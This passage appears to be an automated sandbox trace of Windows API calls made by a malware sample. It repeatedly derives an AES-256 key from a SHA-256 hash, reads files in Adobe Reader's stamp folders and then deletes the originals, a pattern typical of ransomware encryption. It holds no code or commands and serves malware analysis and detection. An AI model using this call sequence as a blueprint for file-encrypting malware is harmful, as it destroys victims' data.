nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0208.759] CryptDestroyHash (hHash=0x284d768) returned 1 [0208.759] CryptDestroyKey (hKey=0x284d728) returned 1 [0208.759] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.760] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\signhere.pdf")) returned 1 [0208.762] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0208.763] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0208.763] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.763] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0208.763] GetFileSize (in: hFile=0x63c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2eb9e [0208.763] ReadFile (in: hFile=0x63c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0208.777] CryptDestroyHash (hHash=0x284d668) returned 1 [0208.777] CryptDestroyKey (hKey=0x284d728) returned 1 [0208.777] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.779] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\standard.pdf")) returned 1 [0208.782] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0208.782] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0208.783] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0208.783] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0208.783] GetFileSize (in: hFile=0x640, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a88d [0208.783] ReadFile (in: hFile=0x640, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0208.829] CryptDestroyHash (hHash=0x284d768) returned 1 [0208.829] CryptDestroyKey (hKey=0x284d728) returned 1 [0208.829] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0208.831] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\standardbusiness.pdf")) returned 1 [0208.973] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0209.160] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.161] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.161] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.161] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.161] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0e [0209.161] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.190] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.190] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.190] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.191] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\dynamic.pdf")) returned 1 [0209.193] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.193] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.193] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.193] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.193] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaf90 [0209.193] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.204] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.204] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.204] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.205] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\hanko.pdf")) returned 1 [0209.207] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.207] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.207] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.207] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.207] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc0af [0209.207] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.212] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.212] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.212] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.213] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\signhere.pdf")) returned 1 [0209.215] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.215] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.215] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.215] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.215] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x217ce [0209.215] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.225] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.225] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.225] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.229] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\standardbusiness.pdf")) returned 1 [0209.238] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0209.288] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.289] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.289] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.289] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.289] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132cc [0209.289] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.415] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.415] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.415] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.416] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\dynamic.pdf")) returned 1 [0209.418] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.419] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.419] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.419] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.419] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7c2 [0209.419] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.462] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.462] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.462] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.464] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\hanko.pdf")) returned 1 [0209.465] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.466] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.466] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.466] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.466] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1182b [0209.466] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.471] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.471] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.471] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.473] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\signhere.pdf")) returned 1 [0209.474] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.475] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.475] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.475] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.475] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x322cc [0209.475] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.521] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.521] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.521] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.522] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\standardbusiness.pdf")) returned 1 [0209.670] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0209.707] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.707] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.707] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.707] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.707] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7d00 [0209.707] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.726] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.726] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.726] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.727] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\dynamic.pdf")) returned 1 [0209.728] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.729] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.729] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.729] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.729] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8770 [0209.729] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.733] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.733] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.733] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.735] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\faces.pdf")) returned 1 [0209.736] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.737] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.737] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.737] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.737] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7dc [0209.737] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.765] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.765] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.765] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.766] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\pointers.pdf")) returned 1 [0209.768] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.768] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.768] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.769] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.769] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5274b [0209.769] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.813] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.813] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.813] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.815] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\signhere.pdf")) returned 1 [0209.819] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.820] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.820] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.820] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.820] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c339 [0209.820] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.833] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.833] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.833] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.836] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\standard.pdf")) returned 1 [0209.839] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.839] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.839] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.839] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.839] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15c7a [0209.839] ReadFile (in: hFile=0x134, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.848] CryptDestroyHash (hHash=0x284d768) returned 1 [0209.848] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.848] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.849] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\standardbusiness.pdf")) returned 1 [0209.851] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0209.976] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.977] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.977] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.977] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0209.977] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe6d5 [0209.977] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0209.982] CryptDestroyHash (hHash=0x284d668) returned 1 [0209.982] CryptDestroyKey (hKey=0x284d728) returned 1 [0209.982] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0209.983] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\dynamic.pdf")) returned 1 [0209.984] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0209.985] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0209.985] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0209.985] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: 